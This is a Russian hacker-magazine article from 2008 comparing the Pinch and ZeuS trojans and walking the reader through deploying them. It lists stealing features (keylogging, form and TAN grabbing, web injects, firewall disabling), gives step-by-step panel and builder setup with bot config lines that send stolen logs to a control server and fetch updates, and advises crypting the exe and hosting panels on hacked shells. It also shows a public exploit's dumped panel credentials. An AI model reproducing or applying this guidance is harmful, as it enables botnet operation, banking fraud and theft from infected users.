Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 120, ДЕКАБРЬ 2008 г.

Что нам стоит трой настроить: плюсы и минусы популярных троянов

Netterberg




Каждый день мы сталкиваемся с задачами, решение которых невозможно без использования троянов. Какой продукт выбрать? Стоит ли писать свой собственный трой или обратить внимание на модификации уже существующих? Какому билду доверить свои силы, время и затраченные средства? Запасись терпением, я подробно расскажу о наиболее известных троях, их конфигурациях и практическом применении.

Речь пойдет, прежде всего, о таких троянах, как Pinch и ZeuS. Во-первых, оба продукта широко известны, а во-вторых, найти рабочую версию в паблике/полупривате не составит большого труда. Следовательно, можно опробовать полученные навыки на практике (естественно, на тренировочной машине, под VmWare, - Прим. Forb). Хочу тебя предостеречь: в Сети валяется куча протрояненных билдов, так что будь осторожен и не сливай софт из сомнительных источников.
Но – ближе к делу! Сначала давай подробнее познакомимся с ZeuS'ом, а затем кратко сравним его с Pinch'ем.

Zeus VS Pinch

ZeuS состоит из двух основных частей:

  1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер;
  2. билдер - Win32-конфигуратор бота.

О панели управления мы поговорим позже, так же, как и о конфигурировании самого троя. Сейчас нас интересует перечень основных возможностей продукта:

  • Отсутствие собственного процесса; как следствие, троянец невидим в списке процессов
  • Обход большинства файрволов (в зависимости от версии)
  • Использование временных файлов с произвольным размером
  • Работает в ограниченных учетных записях Винды (кроме Гостя)
  • Зашифрованное тело бота
  • Блокирует Windows Firewall, что обеспечивает беспрепятственное получение входящих сообщений
  • Все настройки/логи/команды бот хранит/принимает/передает по HTTPS-протоколу в зашифрованном виде
  • Наличие отдельного файла конфигурации позволяет подстраховать себя от потери ботнета в случаи недоступности основного сервера
  • Наличие резервных файлов конфигурации, используемых при отсутствии основного файла конфигурации
  • Возможность работать с любыми браузерами/программами, работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.)
  • Перехват POST-данных и перехват нажатых клавиш, включая данные из буфера обмена
  • Прозрачный URL-редирект на фейк-сайты c заданием простейших условий редиректа (GET/POST-запросы, и т.д.)
  • Работа с веб-инжектами, которые позволяют подменять не только хтмл-страницы, но и любой другой тип данных. Подмена задается при помощи указания масок подмены
  • Получение содержимого нужной страницы с исключением хтмл-тегов
  • Настраиваемый TAN-граббер для любых стран
  • Получение скриншота в области экрана, где была нажата левая кнопка мыши, после захода на нужный URL
  • Получение любых импортируемых сертификатов и их сохранение на сервере
  • Перехват логинов/паролей по протоколам POP3 и FTP в независимости от порта, и запись в лог только при удачной авторизации
  • Поиск на логических дисках файлов по маске и/или загрузка конкретного файла
  • Получение скриншота с компьютера жертвы в реальном времени (компьютер должен находиться вне NAT)

Как видишь, троян обладает феноменальными способностями :). Теперь посмотрим на Pinch.

Pinch состоит из трех частей:

  1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер;
  2. билдер - Win32-конфигуратор трояна;
  3. парсер логов - утила для расшифровки и парсинга логов троя.

Среди основных возможностей продукта – перехват логинов/паролей по протоколам POP3/FTP, а так же граббинг сохраненных данных из IE.

Описывать функциональную часть пинча я не буду, это уже сделали за меня. Скажу лишь, что оба трояна отличаются целью применения. ZeuS предназначен, прежде всего, для построения долгосрочных ботнетов. Тебе обязательно потребуется абузоустойчивый сервер для управления ботнетом и хранения логов. Pinch же, как правило, используют для нанесения «точечных ударов» (протроянивание конкретного человека с целью получения конкретной информации). В этом случае гораздо удобнее и безопаснее заливать админку на ломаный шелл, с последующим удалением оной.

Настройка и конфигурация троев

С Pinch'ем все просто.

1. Устанавливаем логин/пароль в файле filelist.php:

$login='xakep';
$password='blabla';

2. В файле admin.php устанавливаем режим ведения логов:

$mode = 2; //Сохраняем на сервере

3. Заливаем файлы admin.php, filelist.php и каталог /reps на удаленный сервер.

4. Устанавливаем права 777 на каталог /reps.

5. По желанию прописываем и добавляем .htaccess (в целях безопасности).

6. Запускаем билдер, указываем хост и полный путь до admin.php относительно веб-каталога. Например:

хост - 127.0.0.1
путь - /img/admin.php

7. Получаем готовый exe'шник, который криптуем по своему усмотрению.

После того, как трой разослан, необходимо пристально следить за админкой – в скором времени там появятся логи, которые ты сможешь скачать и просмотреть при помощи Parser'а.

А вот с ZeUS'ом все несколько сложнее.

1. Заливаем панельку на сервер, после чего устанавливаем ее:

http://127.0.0.1/web/.install/index.php

2. П ходу инсталляции тебе необходимо указать следующие данные:

  • Root login: логин/пасс для админки ботнета;
  • MySQL server: данные для MySQL (пользователь уже должен существовать, но если указанная БД не существует, то она будет создана автоматически);
  • MySQL tables: названия таблиц в БД (следует изменить в качестве маскировки);
  • Local paths: локальные пути на сервере относительно директории установки.

3. Выбираем способ хранения логов (БД или в файлах) и указываем тайм-аут для ботов.

4. Ставим права 777 на каталог /system и завершаем установку.

5. После создания вложенного каталога /.files, необходимо запретить выполнение скриптов из этого каталога с помощью .htaccess следующего содержания:

RemoveType php
php_flag engine 0
php_flag engine 0

По Сети давно гуляет сплойт, с помощью которого можно без труда залить шелл на твой сервер и завладеть ботнетом, если ты отнесешься невнимательно к этой превентивной мере безопасности.

6. Запускаем билдер (по дефолту – «/local/cp.exe»).

7. Указываем файл конфигурации и жмем «Edit config», после чего конфигурируем будущего бота. Следует обратить внимание на такие пункты, как:

entry "StaticConfig"
;botnet "botnet1"; здесь указываем имя ботнета, в нашем случае - botnet1
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://my_server/web/cfg.bin"; здесь указываем местонахождение основного конфига, в нашем случае - http://my_server/web/cfg.bin
url_compip "http://whatismyip.com/" 256; сайт, на котором можно проверить свой IP, нужен для определения NAT
;blacklist_languages 1049
end

entry "DynamicConfig"
url_loader "http://my_server/web/ldr.exe"; указываем адрес, по которому можно скачать апдейт бота
url_server "http://my_server/web/s.php"; наш сервер, на который будут отправляться логи и файлы с ботов
file_webinjects "webinjects.txt"; файл со списком веб-инжектов

entry "AdvancedConfigs"
"http://reserve_server1/zeus/cfg.bin"; в этом разделе указываем адреса, с которых можно скачать резервный конфиг
end

8. Билдим бота и криптуем его по собственному усмотрению.

Теперь немного о панели управления aka админка. В отличие от примитивной пинчевой панельки, мощная админка зеуса обладает такими функциями, как:

  • Многопользовательский режим; каждому пользователю можно задать определенные права доступа
  • Статистика установок (инсталлов, заражений)
  • Статистика ботов находящихся онлайн
  • Разделение ботнета на саб-ботнеты
  • Обзор онлайновых ботов (в том числе и по фильтру)
  • Просмотр скриншота в реальном времени
  • Просмотр и проверка Sock4
  • Время нахождения бота в онлайне
  • Скорость соединения (только для ботов вне NAT)
  • Хранение логов в базе данных (дает следующие преимущества: поиск логов по фильтру содержимого; поиск логов по шаблонам с выделением нужных POST-данных)
  • Хранение логов в зашифрованных файлах, в структуре директорий ботнетстранаID компьютера
  • Отдача команд ботам (в том числе и по фильтру)
  • Возможность собственноручного модифицирования админки

Как видишь, опций более чем достаточно. Но в каждой бочке меда есть своя ложка дегтя. В случае с ZeuS'ом – это напрочь бажная и дырявая админка, в которой неоднократно находили sql-инъекции. Кроме того, я уже говорил об обязательном запрете на выполнение скриптов в каталоге /.files. Соответствующий сплойт ты без труда найдешь на просторах Сети. Использовать его довольно просто, достаточно лишь передать скрипту необходимые параметры:

HOST: 127.0.0.1
FOLDER: web/

После запуска сплойт выдаст нам следующие данные:

array(8) { [0]=> string(1) "1" ["id"]=> string(1) "1" [1]=> string(4) "root" ["login"]=> string(4) "root" [2]=> string(6) "t00r" ["pass"]=> string(6) "t00r" [3]=> string(10) "8194967292" ["priv"]=> string(10) "8194967292" } array(8) { [0]=> string(1) "2" ["id"]=> string(1) "2" [1]=> string(9) "admin" ["login"]=> string(9) "admin" [2]=> string(6) "12345098" ["pass"]=> string(6) "12345098" [3]=> string(7) "3097136" ["priv"]=> string(7) "3097136" } array(8) { [0]=> string(1) "4" ["id"]=> string(1) "4" [1]=> string(7) "bob" ["login"]=> string(7) "bob" [2]=> string(6) "bobyboy" ["pass"]=> string(6) "bobyboy" [3]=> string(6) "468872" ["priv"]=> string(6) "468872" } MYSQLHOST: localhost MYSQLUSER:zeus MYSQLPASS:grab_pass

Отсюда получаем:

1. Аккаунты к админке:

root - логин
toor - пароль

admin - логин
12345098 - пароль

bob - логин
bobyboy - пароль

2. Аккаунт к СУБД:

логин: zeus
пароль: grab_pass

Сам понимаешь, получить доступ к твоему ботнету не составит особого труда. В любом случае, выбирать тебе, а я лишь описал два наиболее известных и распространенных трояна, существование которых ни для кого не является секретом :).

Danger

Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!

Info

  • При установке админки в ZeuS не забывай об обязательном запрете на выполнение скриптов в каталоге /.files, иначе ботнета не видать, как своих ушей.
  • Стандартная админка ZeuS'а имеет несколько вкусных sql-инъекций. Покопавшись в Сети либо в самой админке можно без труда найти их.
  • При выборе трояна руководствуйся поставленной задачей.
Содержание
ttfb: 14.694929122925 ms